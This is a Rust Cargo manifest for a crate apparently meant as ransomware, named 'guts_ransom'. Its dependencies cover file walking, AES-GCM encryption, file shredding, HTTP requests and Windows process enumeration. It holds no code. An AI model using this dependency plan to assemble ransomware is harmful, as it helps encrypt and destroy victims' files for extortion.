[package]
name = "guts_ransom"
version = "0.1.0"
edition = "2021"

# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html

[dependencies]
walkdir = "2.4.0"
regex = "1.10.2"
aes-gcm = "0.10.3"
heapless = "0.7.16"
file_shred = "1.1.3"
reqwest = { version = "0.11", features = ["blocking"] }
error-chain = "0.12.4"
winapi = { version = "0.3", features = ["winuser","shobjidl_core","tlhelp32"] }